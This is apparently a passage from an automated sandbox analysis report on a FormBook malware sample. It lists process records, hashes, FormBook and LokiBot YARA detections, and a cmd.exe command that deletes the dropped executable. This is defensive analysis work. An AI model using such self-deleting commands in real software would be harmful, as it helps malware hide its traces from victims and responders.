• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.399177906.0000000000080000.00000040.00000001.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.399177906.0000000000080000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.399177906.0000000000080000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:low

General

Start time:15:48:26
Start date:25/02/2021
Path:C:\Windows\explorer.exe
Wow64 process (32bit):false
Commandline:
Imagebase:0x7ff6f22f0000
File size:3933184 bytes
MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high

General

Start time:15:48:40
Start date:25/02/2021
Path:C:\Windows\SysWOW64\explorer.exe
Wow64 process (32bit):true
Commandline:C:\Windows\SysWOW64\explorer.exe
Imagebase:0xb70000
File size:3611360 bytes
MD5 hash:166AB1B9462E5C1D6D18EC5EC0B6A5F7
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Yara matches:
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.587412850.00000000006F0000.00000040.00000001.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.587412850.00000000006F0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.587412850.00000000006F0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.587981327.0000000000B30000.00000004.00000001.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.587981327.0000000000B30000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.587981327.0000000000B30000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.587932425.0000000000B00000.00000040.00000001.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.587932425.0000000000B00000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.587932425.0000000000B00000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: LokiBot_Dropper_Packed_R11_Feb18, Description: Auto-generated rule - file scan copy.pdf.r11, Source: 00000009.00000002.587887659.0000000000983000.00000004.00000020.sdmp, Author: Florian Roth
• Rule: LokiBot_Dropper_Packed_R11_Feb18, Description: Auto-generated rule - file scan copy.pdf.r11, Source: 00000009.00000002.592534520.0000000004FC7000.00000004.00000001.sdmp, Author: Florian Roth
Reputation:high

General

Start time:15:48:43
Start date:25/02/2021
Path:C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):true
Commandline:/c del 'C:\Users\user\Desktop\211094.exe'
Imagebase:0x2a0000
File size:232960 bytes
MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high

General

Start time:15:48:43
Start date:25/02/2021
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff61de10000
File size:625664 bytes
MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
